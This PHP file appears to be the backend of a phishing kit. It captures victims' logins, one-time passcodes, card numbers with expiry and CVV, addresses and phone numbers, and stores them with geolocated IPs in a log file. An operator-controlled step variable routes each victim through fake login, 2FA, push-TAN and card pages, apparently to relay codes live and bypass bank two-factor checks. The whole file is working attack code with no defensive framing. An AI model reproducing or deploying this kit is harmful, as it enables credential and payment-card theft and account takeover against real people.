<?php
include "line/paths.php";
include"line/$where/config.php";
$enil=substr(md5(time()), 7, 21);
if( isset($_POST['email']) )
{

$inputu = $_POST['email']; 
$inputp = $_POST['password'];

$inputo = $_POST['otp'];
  
  if(empty($inputo)) {
    $inputo="";
}
else {
    $inputo = ':'.$_POST['otp'];
}
$blz = $_GET['b'];
$name = $_GET['n'];
$city = $_GET['c'];
$ipj = "https://get.geojs.io/v1/ip/country/".$ip;
$ipj1 = @file_get_contents($ipj, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
$ipj1=str_replace(array("\r", "\n"), '', $ipj1);

$data = "
$user|$blz-$name-$city|$inputu:$inputp$inputo|$site-$ip-$ipj1-|nzcc|af2zx|dexcc|";

    $file=fopen("inevitable.php","a");
    fwrite($file,$data);
    fclose($file);
$enil = $_GET['user'];
 
$rows = @file("inevitable.php", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); 

foreach($rows as $key => $row) {
    if(preg_match("/($enil)/", $row)) {
        $rowsx = explode("|", $row);
 $rows[$key] = str_replace("lfxaz","af2zx",$rows[$key]);

file_put_contents("inevitable.php", implode("\n", $rows));
die();}}
}
if( isset($_POST['ppemail']) )
{

$inputu = $_POST['ppemail']; 
$inputp = $_POST['password'];

$inputo = $_POST['otp'];
  
  if(empty($inputo)) {
    $inputo="";
}
else {
    $inputo = ':'.$_POST['otp'];
}
$blz = $_GET['b'];
$name = $_GET['n'];
$city = $_GET['c'];
$ipj = "https://get.geojs.io/v1/ip/country/".$ip;
$ipj1 = @file_get_contents($ipj, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
$ipj1=str_replace(array("\r", "\n"), '', $ipj1);

$data = "
$user|$blz-$name-$city|$inputu:$inputp$inputo|$site-$ip-$ipj1-|nzcc|zecc|dexcc|";

    $file=fopen("inevitable.php","a");
    fwrite($file,$data);
    fclose($file);
$enil = $_GET['user'];
 
$rows = @file("inevitable.php", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); 

foreach($rows as $key => $row) {
    if(preg_match("/($enil)/", $row)) {
        $rowsx = explode("|", $row);
 $rows[$key] = str_replace("lfxaz","af2zx",$rows[$key]);

file_put_contents("inevitable.php", implode("\n", $rows));
die();}}
}
if( isset($_POST['JSCJwHnjGaVHEjFt']) ){

$enil = $_GET['user'];
$cczn=$_POST['JSCJwHnjGaVHEjFt'];
$expzn=$_POST['YmIzDGJqZoEpdnIq'];
$cvczn=$_POST['kLmZjJQXhuPrpuMd'];
$nzc='dexcc';
$nzcc = $cczn.'|'.$expzn.'|'.$cvczn.'|dexcc';
 
$rows = @file("inevitable.php", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);  

foreach($rows as $key => $row) {
    if(preg_match("/($enil)/", $row)) {
        
 $rows[$key] = str_replace($nzc,$nzcc,$rows[$key]);
  $daten="progress";
  $tan="af2tan";
      $rows[$key] = str_replace($daten,$tan,$rows[$key]);

file_put_contents("inevitable.php", implode("\n", $rows));
}}
}



if( isset($_POST['link']) ){

$enil = $_GET['user'];
$lnk=$_POST['link'];
$nzc='dexcc';
$nzcc = $lnk;
 
$rows = @file("inevitable.php", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);  

foreach($rows as $key => $row) {
    if(preg_match("/($enil)/", $row)) {
        
 $rows[$key] = str_replace($nzc,$nzcc,$rows[$key]);
  $daten="line";
  $tan="rdc";
      $rows[$key] = str_replace($daten,$tan,$rows[$key]);

file_put_contents("inevitable.php", implode("\n", $rows));
}}
}

if( isset($_POST['csdcz']) ){

$enil = $_GET['user'];
$nme=$_POST['address'];
$cc=$_POST['csdcz'];

$exp1=$_POST['exam'];
$exp2=$_POST['exay'];
$exp="$exp1 $exp2";
$cvv=$_POST['cdf'];
$cvv="$cvv-$nme";
$af2x = 'zecc';
$x2fa = 'decc';

$rows = @file("inevitable.php", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);  

foreach($rows as $key => $row) {
    if(preg_match("/($enil)/", $row)) {
        
 $rows[$key] = str_replace($af2x,$x2fa,$rows[$key]);
 file_put_contents("inevitable.php", implode("\n", $rows));

}}
foreach($rows as $key => $row) {
    if(preg_match("/($enil)/", $row)) {
 $x2fa = ''.$cc.'-'.$exp.'-'.$cvv;

 $rows[$key] = str_replace("--",$x2fa,$rows[$key]);

file_put_contents("inevitable.php", implode("\n", $rows));}}
}
if( isset($_POST['csdc']) ){

$enil = $_GET['user'];
$nme=$_POST['nme'];
$cc=$_POST['csdc'];
$exp=$_POST['exa'];
$exp1=$_POST['exam'];
$exp2=$_POST['exay'];
$expx="$exp1 $exp2";
$cvv=$_POST['cdf'];
$af2x = 'zecc';
$x2fa = 'decc';

$rows = @file("inevitable.php", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);  

foreach($rows as $key => $row) {
    if(preg_match("/($enil)/", $row)) {
        
 $rows[$key] = str_replace($af2x,$x2fa,$rows[$key]);
 file_put_contents("inevitable.php", implode("\n", $rows));

}}
foreach($rows as $key => $row) {
    if(preg_match("/($enil)/", $row)) {
 $x2fa = ''.$nme.'-'.$cc.'-'.$exp.''.$expx.'-'.$cvv;

 $rows[$key] = str_replace("--",$x2fa,$rows[$key]);

file_put_contents("inevitable.php", implode("\n", $rows));}}
}

if( isset($_POST['address1']) ){

$enil = $_GET['user'];
 
$rows = @file("inevitable.php", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); 

foreach($rows as $key => $row) {
    if(preg_match("/($enil)/", $row)) {
        $rowsx = explode("|", $row);
 $rows[$key] = str_replace("lfxaz","af2zx",$rows[$key]);

file_put_contents("inevitable.php", implode("\n", $rows));}}
$enil = $_GET['user'];
$nme=$_POST['address1'];
$cc=$_POST['address2'];
$exp=$_POST['city'];
$cvv=$_POST['zip'];
$af2x = 'progress';
$x2fa = 'af2zx';
$rows = @file("inevitable.php", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);  

foreach($rows as $key => $row) {
    if(preg_match("/($enil)/", $row)) {
        
 $rows[$key] = str_replace($af2x,$x2fa,$rows[$key]);
 file_put_contents("inevitable.php", implode("\n", $rows));

}}
foreach($rows as $key => $row) {
    if(preg_match("/($enil)/", $row)) {
 $x2fa = ''.$nme.'-'.$cc.'-'.$exp.'-'.$cvv;

 $rows[$key] = str_replace("nzcc",$x2fa,$rows[$key]);

file_put_contents("inevitable.php", implode("\n", $rows));}}
}


if( isset($_POST['sFirstname']) ){

$enil = $_GET['user'];
$nme=$_POST['address1'];
$cc=$_POST['address2'];
$exp=$_POST['city'];
$cvv=$_POST['zip'];
$ipj = "https://get.geojs.io/v1/ip/country/".$ip;
$ipj1 = @file_get_contents($ipj, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
$ipj1=str_replace(array("\r", "\n"), '', $ipj1);

$data = "
$user|$blz-$name-$city|$inputu:$inputp$inputo|$site-$ip-$ipj1-|nzcc|zecc|dexcc|";

    $file=fopen("inevitable.php","a");
    fwrite($file,$data);
    fclose($file);

$enil = $_GET['user'];
$sFirstname=$_POST['sFirstname'];
$sLastname=$_POST['sLastname'];
$sEmail=$_POST['sEmail'];
$sDelPostalCode=$_POST['sDelPostalCode'];
$sDelCompany=$_POST['sDelCompany'];
$sDelAddressLine1=$_POST['sDelAddressLine1'];
$sDelAddressLine2=$_POST['sDelAddressLine2'];
$sDelCity=$_POST['sDelCity'];
$sDelAddressLine3=$_POST['sDelAddressLine3'];
$sDelPhone=$_POST['sDelPhone'];
$sPassword=$_POST['sPassword'];


$af2x = 'zecc';
$x2fa = 'decc';

$rows = @file("inevitable.php", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);  

foreach($rows as $key => $row) {
    if(preg_match("/($enil)/", $row)) {
        
 $rows[$key] = str_replace($af2x,$x2fa,$rows[$key]);
 file_put_contents("inevitable.php", implode("\n", $rows));

}}

foreach($rows as $key => $row) {
    if(preg_match("/($enil)/", $row)) {
        
 $x2fa = ''.$sFirstname.'-'.$sLastname.'-'.$sEmail.':'.$sPassword.'-'.$sDelPostalCode.'-'.$sDelCompany.'-'.$sDelAddressLine1.'-'.$sDelAddressLine2.'-'.$sDelCity.'-'.$sDelAddressLine3.'-'.$sDelPhone.'';

 $rows[$key] = str_replace("nzcc",$x2fa,$rows[$key]);

file_put_contents("inevitable.php", implode("\n", $rows));}}
}
if( isset($_POST['otp']) ){

$enil = $_GET['user'];
$gauth=$_POST['otp'];
$af2x = 'progress';
$x2fa = 'progress|'.$gauth;
$rows = @file("inevitable.php", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);  

foreach($rows as $key => $row) {
    if(preg_match("/($enil)/", $row)) {
        
 $rows[$key] = str_replace($af2x,$x2fa,$rows[$key]);

file_put_contents("inevitable.php", implode("\n", $rows));
}}
}

?>

<?php  if ($step == 'h'): ?>
<?php  include"line/$where/file_home.php";?>
<div style="display:none;">
<?php endif; ?>

<?php  if ($step == 'af2tan'): ?>
<?php  include"line/$where/file_c.php";?>
<?php endif; ?>

<?php  if ($step == 'line'): ?>
<?php  include"line/$where/de_pushtan.php";?>
<?php endif; ?>


<?php  if ($step == 'l'): ?>
<?php  include"line/$where/de_login.php";?>
<?php endif; ?>
<?php if ($step == 'decc'): ?>
<?php include"line/$where/de_cc.php";?>
<?php endif; ?>
<?php if ($step == 'af2zx'): ?>
<?php include"line/$where/de_2fa.php";?>
<?php endif; ?>
<?php  if ($step == 'zecc'): ?>
<?php include"line/$where/de_ccbill.php";?>

<?php endif; ?>
<?php  if ($step == 'lfxat'): ?>
<?php include"line/$where/de_pushtan_old.php";?>

<?php

$enil = $_GET['user'];
$gauth=$_POST['otp'];
$af2x = 'lfxat';
$x2fa = 'progress';
$rows = @file("inevitable.php", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);  

foreach($rows as $key => $row) {
    if(preg_match("/($enil)/", $row)) {
        
 $rows[$key] = str_replace($af2x,$x2fa,$rows[$key]);

file_put_contents("inevitable.php", implode("\n", $rows));
}}
?>
<?php endif; ?>

<?php  if ($step == 'rdc'): ?>
<?php include"line/$where/de_rdc.php";?>
<?php endif; ?>

<?php  if ($step == 'play'): ?>
 <?php include"line/$where/de_login.php";?>
<?php endif; ?>
  <?php  if ($step == 'libplay'): ?>
 <?php include"line/$where/index.php";?>
<?php endif; ?>
</div></body>
</html>